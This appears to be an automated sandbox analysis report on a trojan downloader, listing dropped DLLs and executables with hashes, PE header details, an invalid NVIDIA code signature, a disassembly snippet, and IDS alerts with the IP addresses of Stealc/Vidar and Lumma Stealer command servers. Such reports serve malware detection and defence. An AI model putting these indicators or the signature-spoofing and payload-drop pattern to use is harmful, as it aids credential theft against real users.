SHA-512:	0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4\|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\a43486128347[1].exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	568400
Entropy (8bit):	7.712965594830316
Encrypted:	false
SSDEEP:	12288:KfhW/2ohbCZHkq5maGbAg/d1G0UL7ckKAm4F4Z/EA64fGETEO:KfUuohRqebAg/d1ZS7vKApFR7mt
MD5:	F56A4A7B59E1E81087BB64A4A70FB32F
SHA1:	441C37E16C00135C5CFA3F6E150136052C5B105C
SHA-256:	DEE89B739072D5BF4C3389E562FE1C8FE63D33DDC8990517F7E8EA5A3C852522
SHA-512:	29F6547886998395DE4E2BEA7D26251E47A587D6119CD794071A176095F1EDB0C970E6FD199B572D569A16DAF3AF77E8B43C67B62B8A5D88FB4FBD058E4AA31E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X...9.G.9.G.9.G.K.F.9.G.K.Fv9.G.K.F.9.G..F.9.G..F.9.G.K.F.9.G.9.G.9.G..F.9.G...F.9.G...F.9.GRich.9.G........PE..L....}.g...............).....>..............@....@.................................~}....@.....................................<...................(...(&...p..t.......................................@............@..0............................text....-.......................... ..`.rdata..r....@.......2..............@..@.data....y.......j..................@....reloc..t....p.......>..............@..B.rsrc................\..............@..@........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\delays.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	1048575
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXH:3
MD5:	923946E60719A4CE93AD6C89A716B478
SHA1:	6687FA0016D997BA7635EE508453CF7DC709A627
SHA-256:	69AB9D59984ED804C93E1AB0646F6FA0CD4C5F5CCC7D2A80CD17549AFB789226
SHA-512:	BDDA0674E75695CF6AC2C11F557002855BEA5769975C14DC37139F3518DBBA0C88644B4AF1A8CD801B1E0AF82D5763028FFED704ABC8CEC533B3B4861C8F2356
Malicious:	false
Preview:	rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.425688401637178
Encrypted:	false
SSDEEP:	6144:uSvfpi6ceLP/9skLmb0OTgWSPHaJG8nAgeMZMMhA2fX4WABlEnNN0uhiTw:NvloTgW+EZMM6DFy303w
MD5:	AA1DD69BA2633676D2A8E78461A6FD6A
SHA1:	723A750E4595857E3CADA9E9F90B7C66093CB2CC
SHA-256:	D2B9E20E378712EE359C6585814259E956D463BCA8BE57D80819A8FA68A739DD
SHA-512:	E2EE4A254E292ECE2924458B761D75A7411390014051E26A07633EECB7231DFEC94948C236C33489E38852E91D49BD260175F7208732E1E7DBE938E6E3682D77
Malicious:	false
Preview:	regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm*..q................................................................................................................................................................................................................................................................................................................................................>..E........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.74575451619306
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Trojan.DownLoader47.43477.29852.19410.exe
File size:	612'944 bytes
MD5:	af5bfaa4908459155ade24245aab4a1b
SHA1:	9d816d1d533e0b29e3765a1c5b8aba8de69e2f0b
SHA256:	53c454d3daba412d544f91eddec97c12c12f0b16aa1aa1595527be78210fbfcf
SHA512:	c4e51850a87d26253c81673021a79d5292344ad6e7b02c92fd65bb04d9832d18522083137b7e662779a7043bcfd39a879e16f7acbd2797a0f85993178fad76cd
SSDEEP:	12288:dMmEES7ltqomDzkCeg3cOZG7/hHijTt9qhRuhUiMpwFDZ64fEETEO:dM7P7l6eQl9+Rn+klmt
TLSH:	99D4F11531C08073E5A61A3209F4EB78AF3DF8708BA25D8F67D05BBE4F34381962566B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X...9.G.9.G.9.G.K.F.9.G.K.Fv9.G.K.F.9.G...F.9.G...F.9.G.K.F.9.G.9.G.9.G...F.9.G...F.9.G...F.9.GRich.9.G........PE..L....V.g...

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4085f3
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x670556B5 [Tue Oct 8 15:58:45 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	21fb2582c6872f8dcacc8da20d67840e

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 01:00:00 17/01/2026 00:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
call 00007F2A7C7D82DFh
jmp 00007F2A7C7D784Fh
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007F2A7C7D79EBh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007F2A7C7D79DCh
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007F2A7C7D79DEh
add edx, 28h
cmp edx, esi
jne 00007F2A7C7D79BCh
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007F2A7C7D79CBh
push esi
call 00007F2A7C7D85E3h
test eax, eax
je 00007F2A7C7D79F2h
mov eax, dword ptr fs:[00000018h]
mov esi, 00490B50h
mov edx, dword ptr [eax+04h]
jmp 00007F2A7C7D79D6h
cmp edx, eax
je 00007F2A7C7D79E2h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007F2A7C7D79C2h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007F2A7C7D79D9h
mov byte ptr [00490B54h], 00000001h
call 00007F2A7C7D7C89h
call 00007F2A7C7DAB96h
test al, al
jne 00007F2A7C7D79D6h
xor al, al
pop ebp
ret
call 00007F2A7C7E3A65h
test al, al
jne 00007F2A7C7D79DCh
push 00000000h
call 00007F2A7C7DAB9Dh
pop ecx
jmp 00007F2A7C7D79BBh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [00490B55h], 00000000h
je 00007F2A7C7D79D6h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2da98	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x94000	0x3d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x93428	0x2628
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x92000	0x1c74	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2bcc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2bc00	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x24000	0x130	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x22d1e	0x22e00	464b8e172059de0bf7daa430326650ed	False	0.5820942540322581	data	6.661416473001743	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x24000	0xa172	0xa200	cbe261bdf570c92893ca21bd3c0988ea	False	0.4326292438271605	data	4.951923968974829	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2f000	0x62780	0x61800	ed60c002283ec414c3359788836d97b3	False	0.9920572916666667	DOS executable (block device driver \377\377\377\377)	7.993939358367123	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x92000	0x1c74	0x1e00	a82c794f0a3b239390be68d0f422d5b5	False	0.71953125	data	6.398879055564347	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x94000	0x3d8	0x400	08b87108e87e22860e09fdde08726dda	False	0.439453125	data	3.287044161603086	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x94058	0x380	data	English	United States	0.46205357142857145

Imports

DLL

Import

USER32.dll

CloseWindow

KERNEL32.dll

GetStdHandle, CreateFileW, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, HeapSize, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, WriteConsoleW, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-08T20:47:21.245058+0200	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.5	49755	95.164.90.97	80	TCP
2024-10-08T20:47:21.875917+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	95.164.90.97	80	192.168.2.5	49755	TCP
2024-10-08T20:47:22.619086+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	95.164.90.97	80	192.168.2.5	49755	TCP
2024-10-08T20:47:40.112889+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	49875	147.45.44.104	80	TCP
2024-10-08T20:47:42.995479+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49886	188.114.96.3	443	TCP
2024-10-08T20:47:42.995479+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49886	188.114.96.3	443	TCP
2024-10-08T20:47:43.993818+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49894	188.114.96.3	443	TCP
2024-10-08T20:47:43.993818+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49894	188.114.96.3	443	TCP
2024-10-08T20:47:45.176633+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49902	188.114.97.3	443	TCP
2024-10-08T20:47:45.176633+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49902	188.114.97.3	443	TCP
2024-10-08T20:47:46.305352+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49911	104.21.33.249	443	TCP
2024-10-08T20:47:46.305352+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49911	104.21.33.249	443	TCP
2024-10-08T20:47:47.431215+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49917	172.67.205.156	443	TCP
2024-10-08T20:47:47.431215+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49917	172.67.205.156	443	TCP
2024-10-08T20:47:48.766658+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49923	172.67.140.193	443	TCP
2024-10-08T20:47:48.766658+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49923	172.67.140.193	443	TCP
2024-10-08T20:47:50.049508+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49936	104.21.79.35	443	TCP
2024-10-08T20:47:50.049508+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49936	104.21.79.35	443	TCP
2024-10-08T20:47:51.088531+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49942	188.114.96.3	443	TCP
2024-10-08T20:47:51.088531+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49942	188.114.96.3	443	TCP
2024-10-08T20:47:53.679779+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49957	172.67.206.204	443	TCP
2024-10-08T20:47:53.679779+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49957	172.67.206.204	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 8, 2024 20:46:51.045496941 CEST	49674	443	192.168.2.5	23.1.237.91
Oct 8, 2024 20:46:51.045500040 CEST	49675	443	192.168.2.5	23.1.237.91
Oct 8, 2024 20:46:51.139229059 CEST	49673	443	192.168.2.5	23.1.237.91
Oct 8, 2024 20:47:00.654675007 CEST	49675	443	192.168.2.5	23.1.237.91
Oct 8, 2024 20:47:00.654685974 CEST	49674	443	192.168.2.5	23.1.237.91
Oct 8, 2024 20:47:00.748414993 CEST	49673	443	192.168.2.5	23.1.237.91
Oct 8, 2024 20:47:02.400842905 CEST	443	49706	23.1.237.91	192.168.2.5
Oct 8, 2024 20:47:02.403352022 CEST	49706	443	192.168.2.5	23.1.237.91
Oct 8, 2024 20:47:12.711884022 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:12.711921930 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:12.711980104 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:12.712342024 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:12.712354898 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:12.801069975 CEST	49706	443	192.168.2.5	23.1.237.91
Oct 8, 2024 20:47:12.801155090 CEST	49706	443	192.168.2.5	23.1.237.91
Oct 8, 2024 20:47:12.801641941 CEST	49723	443	192.168.2.5	23.1.237.91
Oct 8, 2024 20:47:12.801685095 CEST	443	49723	23.1.237.91	192.168.2.5
Oct 8, 2024 20:47:12.801769972 CEST	49723	443	192.168.2.5	23.1.237.91
Oct 8, 2024 20:47:12.802306890 CEST	49723	443	192.168.2.5	23.1.237.91
Oct 8, 2024 20:47:12.802320957 CEST	443	49723	23.1.237.91	192.168.2.5
Oct 8, 2024 20:47:12.807121038 CEST	443	49706	23.1.237.91	192.168.2.5
Oct 8, 2024 20:47:12.807137012 CEST	443	49706	23.1.237.91	192.168.2.5
Oct 8, 2024 20:47:13.401751041 CEST	443	49723	23.1.237.91	192.168.2.5
Oct 8, 2024 20:47:13.402335882 CEST	49723	443	192.168.2.5	23.1.237.91
Oct 8, 2024 20:47:13.418374062 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.418526888 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.447241068 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.447289944 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.448185921 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.501260042 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.641254902 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.683413029 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.749259949 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.749310970 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.749331951 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.749363899 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.749404907 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.749404907 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.749404907 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.749424934 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.749454975 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.749450922 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.749470949 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.749501944 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.750163078 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.837025881 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.837074041 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.837100029 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.837120056 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.837150097 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.837197065 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.839365005 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.839427948 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.839464903 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.839469910 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.839498043 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.840806007 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.926954031 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.927000046 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.927078962 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.927098036 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.927130938 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.927158117 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.927915096 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.927957058 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.928010941 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.928020000 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.928081989 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.928081989 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.929292917 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.929335117 CEST	443	49721	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:13.929383039 CEST	49721	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:13.929388046 CEST	443	49721	13.107.246.60	192.168.2.5
